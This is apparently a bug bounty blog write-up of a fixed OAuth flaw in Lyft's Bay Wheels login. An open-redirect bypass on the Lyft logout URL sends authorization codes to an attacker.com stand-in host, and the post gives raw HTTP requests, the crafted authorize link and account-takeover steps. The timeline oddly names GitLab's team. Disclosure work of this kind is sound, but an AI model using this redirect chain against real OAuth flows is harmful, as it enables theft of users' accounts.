Lyft : Account takeover of baywheels accounts : Stealing Oauth Token with Open redirect

-

  Company Information : 



Lyft, Inc. is an American company offering mobility as a service, ride-hailing, vehicles for hire, motorized scooters, a bicycle-sharing system, rental cars, and food delivery in the United States and select cities in Canada.

Bug Category : 

Oauth 2.0 Vulnerability - Malicious Redirect URL 

While browsing the web, you've almost certainly come across sites that let you log in using your social media account. The chances are that this feature is built using the popular OAuth 2.0 framework. OAuth 2.0 is highly interesting for attackers because it is both extremely common and inherently prone to implementation mistakes. This can result in a number of vulnerabilities, allowing attackers to obtain sensitive user data and potentially bypass authentication completely.


Target  Information : 

https://www.lyft.com/


Technical Details of the Bug : 

The Oauth Flow of connecting Baywheels account through Lyft has Oauth misconfiguration. It Allows Only Open redirects with lyft products. Ex: www.lyft.com, api.lyft.com , account.baywheels.com etc. At this point this configuration looks pretty secure. The Only possible attack is to find open redirect in the these whitelisted domains and redirect the Oauth token to attacker website. After working on many redirect end points , i found Open redirect bypass on Lyft logout URL.
Open redirect bypass :  Original URL :

https://www.lyft.com/logout?next=https://www.lyft.com


Bypass URL :
https://www.lyft.com/logout?next=//attacker.com\@www.lyft.com


In original Attack this will be used by putting # at the end and the Oauth token will be stored in Hash URL which attacker can steal from the logs. Now When you have working Open redirect , we can steal the Oauth token through redirect with the help of hash.

Oauth Workflow :

First Login with your Lyft Account and just open the account.baywheels.com 1.Open account.baywheels.com Request:
GET / HTTP/1.1 2Host: account.baywheels.com 3User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 4Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 5Accept-Language: en-US,en;q=0.5 6Accept-Encoding: gzip, deflate 7Connection: close 8Cookie: [cookies]

response :
HTTP/1.1 302 Found 2x-frame-options: DENY 3location: https://account.lyft.com/authorize?client_id=rT6YPX1wEscm&redirect_uri=http%3A%2F%2Faccount.baywheels.com%2F&response_type=code&v=baywheels 4vary: Accept, Accept-Encoding 5content-type: text/html; charset=utf-8 6date: Sun, 16 Feb 2020 07:36:42 GMT 7x-envoy-upstream-service-time: 1 8server: envoy-iad 9connection: close 10Content-Length: 346 11 12<p>Found. Redirecting to <a href="https://account.lyft.com/authorize?client_id=rT6YPX1wEscm&amp;redirect_uri=http%3A%2F%2Faccount.baywheels.com%2F&amp;response_type=code&amp;v=baywheels">https://account.lyft.com/authorize?client_id=rT6YPX1wEscm&amp;redirect_uri=http%3A%2F%2Faccount.baywheels.com%2F&amp;response_type=code&amp;v=baywheels</a></p>

2.Authorize request to lyft : Request : 
GET /authorize?client_id=rT6YPX1wEscm&redirect_uri=http%3A%2F%2Faccount.baywheels.com%2F&response_type=code&v=baywheels HTTP/1.1 2Host: account.lyft.com 3User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0 4Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 5Accept-Language: en-US,en;q=0.5 6Accept-Encoding: gzip, deflate 7Connection: close 8Cookie: [cookies]

Note : This is the main vulnerable request. Here you have to change the redirect_uri parameter to the Open redirect parameter to below URL.

URL : 
https%3A%2F%2Fwww.lyft.com%2Flogout%3Fnext%3D%2F%2Fattacker.com%5C%40www.lyft.com%23

Response : 
HTTP/1.1 302 Found 2x-frame-options: DENY 3location: https://www.lyft.com/logout?next=//attacker.com%5C@www.lyft.com#&code=AQGAAAAAAF5I8sqQfgNMfcqnpdCRPKbho4RcQ96m1jBOTvzYEdj3le5jTsl9HtteEuP5Xjd29hh5dQWrzbxvEDA6TM_DCXc8X7aH__-O5BSSo8rDwPZUFxHSHIMqqfqlXPmIZskak8MGZ4Y%3D 4vary: Accept, Accept-Encoding 5content-type: text/html; charset=utf-8 6date: Sun, 16 Feb 2020 07:44:10 GMT 7x-envoy-upstream-service-time: 44 8server: envoy-iad 9connection: close 10Content-Length: 484 11 12<p>Found. Redirecting to <a href="https://www.lyft.com/logout?next=//attacker.com%5C@www.lyft.com#&amp;code=AQGAAAAAAF5I8sqQfgNMfcqnpdCRPKbho4RcQ96m1jBOTvzYEdj3le5jTsl9HtteEuP5Xjd29hh5dQWrzbxvEDA6TM_DCXc8X7aH__-O5BSSo8rDwPZUFxHSHIMqqfqlXPmIZskak8MGZ4Y%3D">https://www.lyft.com/logout?next=//attacker.com%5C@www.lyft.com#&amp;code=AQGAAAAAAF5I8sqQfgNMfcqnpdCRPKbho4RcQ96m1jBOTvzYEdj3le5jTsl9HtteEuP5Xjd29hh5dQWrzbxvEDA6TM_DCXc8X7aH__-O5BSSo8rDwPZUFxHSHIMqqfqlXPmIZskak8MGZ4Y%3D</a></p>

Working proof of concept and steps :

create 2 accounts. Victim and Attacker. 1.Login to https://www.lyft.com account from victim user. 2.Now Attacker send below link to victim.
https://account.lyft.com/authorize?client_id=rT6YPX1wEscm&redirect_uri=https%3A%2F%2Fwww.lyft.com%2Flogout%3Fnext%3D%2F%2Fattacker.com%5C%40www.lyft.com%23&response_type=code&v=baywheels

3.Final URL after redirect will look like this.
https://attacker.com/@www.lyft.com#&code=AQGAAAAAAF5I9B--HbWUSXizWUn7khiIM6ACcd6sZ2AiQhOa6XhEsZS9h40WgxBk3wdVcBukrOpQ5uqG0ZYJ781r7_RYgVrX_icG-ETZ_dMPveo-pvjGlWXITNI3x1T8ntEjmYJdokwyW7g%3D

As you can see that the code has come to attacker.com domain with Hash URL. Now Attacker open his Logs and capture the token.
4.Now to login to victim's account, Attacker sends below request to account.baywheels.com.
https://account.baywheels.com/profile?code=[Code_captured]

5.Attacker will be in victim's account and it will be Account takeover.


Impact : 

Account takeover of baywheels accounts : Stealing Oauth Token with Open redirect.

Timeline : 
Feb 16th 2020: Report send to Gitlab product Security Team through Hackerone.
Feb 17th 2020 : Report Accepted and Triaged.
Feb 19th 2020 : Complete issue was resolved and confirmed.
Feb 21th 2020 : 3000$ Bounty Rewarded


Comments

Post a Comment

Popular posts from this blog

Account Takeover Apple App Store Connect Account of Any user and Steal Developer API/Subscription Keys of any user(CORS+XSS) worth 8500$

-
Image
Company Information :  Apple Inc. is an American multinational technology company headquartered in Cupertino, California. As of March 2023, Apple is the world's biggest company by market capitalization, and with US$394.3 billion the largest technology company by 2022 revenue. Bug Category :  Cross-origin resource sharing (CORS) : Cross-origin resource sharing (CORS) is a mechanism that allows restricted resources on a web page to be accessed from another domain outside the domain from which the first resource was served. A web page may freely embed cross-origin images, stylesheets, scripts, iframes, and videos. Stored Cross-site-scripting (XSS) : Cross-site scripting (XSS) is an attack in which an attacker injects malicious executable scripts into the code of a trusted application or website. Attackers often initiate an XSS attack by sending a malicious link to a user and enticing the user to click it. Impact : 1.Stealing  App Store connect API key with Full Access , Subs...
Read more

Amazon Web Services : Takeover Workbook and delete the Owner on https://builder.honeycode.aws by collaborator user (IDOR) worth 7200$

-
Image
  Company Information :  Amazon Web Services, Inc. is a subsidiary of Amazon that provides on-demand cloud computing platforms and APIs to individuals, companies, and governments, on a metered, pay-as-you-go basis. Clients will often use this in combination with autoscaling. Bug Category :  Insecure direct object reference(IDOR ) :  Insecure direct object reference is a type of access control vulnerability in digital security. This can occur when a web application or application programming interface uses an identifier for direct access to an object in an internal database but does not check for access control or authentication. Target  Information :  https://builder.honeycode.aws/ Technical Details of the Bug :  On https://builder.honeycode.aws you can add workbook and add users as collaborator. collaborator have limited access to the functionalities and sharing part. But there is a way which can lead to collaborator to demote the owner , remove him ...
Read more

UnAuth Access to Twitter Private Tweets and messages Media Content Access(IDOR)

-
Image
Company Info : Twitter is an online news and social networking service where users post and interact with messages, "tweets", restricted to 140 characters. Registered users can post tweets, but those who are unregistered can only read them. Users access Twitter through its website interface, SMS or a mobile device app.Twitter Inc. is based in San Francisco, California, United States, and has more than 25 offices around the world. Bug category : Indirect Object Reference(IDOR) Link : https://www.owasp.org/index.php/Top_10_2013-A4-Insecure_Direct_Object_References Technical Details of the Bug :  Applications frequently use the actual name or key of an object when generating web pages. Applications don’t always verify the user is authorized for the target object. This results in an insecure direct object reference flaw. Testers can easily manipulate parameter values to detect such flaws. Code analysis quickly shows whether authorization is properly verified. Bug Des...
Read more